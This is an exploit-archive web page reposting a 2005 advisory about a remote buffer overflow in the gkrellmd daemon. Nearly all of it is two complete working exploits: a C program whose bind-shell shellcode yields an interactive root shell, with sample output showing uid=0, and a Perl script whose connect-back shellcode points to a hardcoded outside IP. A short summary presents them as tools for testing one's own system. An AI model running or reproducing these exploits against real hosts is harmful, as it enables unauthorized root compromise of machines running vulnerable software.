首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GKrellM Vulnerable to Remotely Exploitable Buffer Overflow
来源:d_fence@gmx.net 作者:r-code 发布时间:2005-12-23  

GKrellM Vulnerable to Remotely Exploitable Buffer Overflow (Shellcode Exploit)

Summary
As we reported in our previous article: GKrellM Vulnerable to Remotely Exploitable Buffer Overflow, a remotely exploitable buffer overflow in GKrellM allows attackers to gain elevated privileges by causing the program to overflow one of its internal buffers (and causing it to execute arbitrary code due to this). The following two exploit codes can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by r-code (Debian) and kokanin (FreeBSD).

Details
Exploit (Debian):
/*********************************************************************************\
** gkrellmd < 2.1.12 (linux) remote exploit written by r-code d_fence@gmx.net
**
** The Exploit was tested on Debian 3.0 (Woody) with gkrellmd 2.1.4
** and worked fine. To work with other distros you might have to adjust the offset
** which should be between 1800-2300, you can try in 100 steps..
** The only problems is that gkrellmd crashes each time an unsuccesful exploitation
** attempt is run. Therefore you`d have only one chance to do it, otherwise
** the daemon will crash and will need to be restarted..
**
** This exploit allows to gain the uid/gid of the person who runs gkrellmd
** (often r00t). Therefore it might be quite useful for some of you..
**
** example:
**
**
** r-code@coredump:/tmp$ ./gkrhack0x03 localhost 2100
** :: gkrellmd < 2.1.12 (linux) exploit by r-code d_fence@gmx.net [Elite FXP Team]
**
** * Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher
** * Flames to: ElSiLaSoF
**
** [*] Building packet...
** [+] OFFSET 0x834, RET_ADDR: 0xbffff7cb
** [+] Connecting to 'localhost' on port '19150'..
** [+] Sending packets..
** [+] ExPloIt SuCcEsFul!!
** [+] EnJoY Ya ShElL (Elite FXP Team)
**
** uid=0(root) gid=0(root) groups=0(root)
** 11:01:02 up 1:36, 2 users, load average: 1.05, 0.37, 0.21
** USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
** root tty1 - 09:26 1:34m 1.60s 0.01s /bin/sh /usr/bi
** r-code tty3 - 11:00 1.00s 1.63s 0.29s ./a.out localho
** Linux coredump 2.4.20 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
** readline: warning: rl_prep_terminal: cannot get terminal settingsbash-2.05a#
**
** Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher
** Flames to: ElSiLaSoF - fuck ya bitch!!!
\*********************************************************************************/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <errno.h>

/* Bind shellcode by wsxz from priv8security , binds shell on 5074 */

char shellcode[]=
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1"
"\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04"
"\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66"
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6"
"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

#define LEN 500
#define DEFAULT_OFFSET 2100 /* Try to play with offsets around 1800 - 2300 in 100 steps */
#define PORT 19150

int connect_to_host(char *hs,int port)
{
int sock,x;
struct sockaddr_in addr;
struct hostent *host;

if(!(host = gethostbyname(hs))) {
perror("gethostbyname(): while resolving host");
exit(1);
}


addr.sin_family = AF_INET;
addr.sin_port = htons(port);
bcopy(host->h_addr,&addr.sin_addr,host->h_length);

if((sock = socket(AF_INET, SOCK_STREAM, 0))<0) {
perror("socket() error");
return(-1);
}

if((x = connect(sock, (struct sockaddr *)&addr, sizeof(addr)))<0) {
perror("connect() error");
return(-1);
}

return sock;
}

void shell(int sd)
{
int check;
char cmd[]="id; w; uname -a; export TERM=vt100; exec /bin/bash -i\n";
char buf[2048];
fd_set fd;

bzero(buf,2048);
send(sd,cmd,strlen(cmd),0);

while(1) {

fflush(stdout);
FD_ZERO(&fd);
FD_SET(sd,&fd);
FD_SET(STDIN_FILENO,&fd);
select(sd+1,&fd,NULL,NULL,NULL);

if(FD_ISSET(sd,&fd)) {
if((check=read(sd,buf,2048))<=0)
exit(1);

buf[check]=0;
printf("%s",buf);
}

if(FD_ISSET(STDIN_FILENO,&fd)) {
if((check=read(STDIN_FILENO,buf,2048))>0) {
buf[check]=0;
write(sd,buf,check);
}
}
}
return;
}


int main(int argc,char **argv) {
int i,sd;
char *evilstr,*str;
unsigned long int retaddr=0,offset=DEFAULT_OFFSET;

printf(":: gkrellmd < 2.1.12 (linux) exploit by r-code d_fence@gmx.net [Elite FXP Team]\n\n");
printf("* Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher\n");
printf("* Flames to: ElSiLaSoF\n\n");

if(argc<2 || argc>3){
printf("[-] Usage: ./gkrhack0x03 [host] <offset> #Offset should be between 1800-2300\n");
return -1;
}


if(argc>2)
offset=atoi(argv[2]);

retaddr=0xbfffffff - offset;

printf("[*] Building packet...\n");
printf("[+] OFFSET 0x%x, RET_ADDR: 0x%x\n",offset,retaddr);

evilstr=(char *)malloc(LEN);
memset(evilstr,'A',500);

evilstr[156] = (retaddr & 0x000000ff);
evilstr[157] = (retaddr & 0x0000ff00) >> 8;
evilstr[158] = (retaddr & 0x00ff0000) >> 16;
evilstr[159] = (retaddr & 0xff000000) >> 24;

evilstr[154]=0xeb; // Jump 4 bytes over the retaddr
evilstr[155]=0x04;

memset(evilstr+160,'A',500-160);

for(i=0;i<strlen(shellcode);i++)
evilstr[LEN - strlen(shellcode)+i]=shellcode[i];

evilstr[LEN]=0x00;

printf("[+] Connecting to '%s' on port '%d'..\n",argv[1],PORT);

if((sd=connect_to_host(argv[1],PORT))<0) {
printf("[-] Couldn`t connect to host..\n");
exit(1);
}

printf("[+] Sending packets..\n");

if(send(sd,"gkrellm 2.1.10\n",15,0)<0) {
perror("send(): while sending client version");
return -1;
}

if(send(sd,evilstr,500,0)<0) {
perror("send(): while sending evil string");
return -1;
}

close(sd);

if((sd=connect_to_host(argv[1],5074))<0) {
printf("[-] Exploit failed..! #Probably due to a bad offset\n");
return -1;
}

printf("[+] ExPloIt SuCcEsFul!!\n");
printf("[+] EnJoY Ya ShElL (Elite FXP Team)\n\n");

shell(sd);

return 1;
}

Exploit (FreeBSD):
#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# I just ripped their code and made it do something useful instead
# shellcode by bighawk(i think) - wow this is badly formatted.

use IO::Socket;
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./DSR-geekrellm.pl <host> <port> (default gkrellmd is 19150)\n"; exit(-1); }

$host = $ARGV[0];
$port = $ARGV[1];
$ret = pack("l",0xbfbffa60);
$shellcode = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x26\x26\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";
#--> connect-back to a useless ip, change it:) ^^217.157.38.38^ ^^10000^
$nop = "\x90";
$buf = "A" x 128 . $ret x 2 . $nop x 500 . $shellcode;

$socket = new IO::Socket::INET
(
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)\n" unless $socket;

print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;

close($socket);



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·wu_ftpd <=2.6.1 remote root
·identd 1.2 remote exploit
·samba-2.2.8 < remote root e
·PHP-Fusion 6.x rating Paramete
·GoldenFTPd APPE Stack Overflow
·Veritas Storage Foundation VCS
·Mailenable Enterprise Examine
·phpBB <= 2.0.17 signature_b
·Macromedia Flash Media Server
·Microsoft IIS Malformed URI Do
·Eudora Qualcomm WorldMail LIST
·Microsoft IIS Malformed URI Do
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved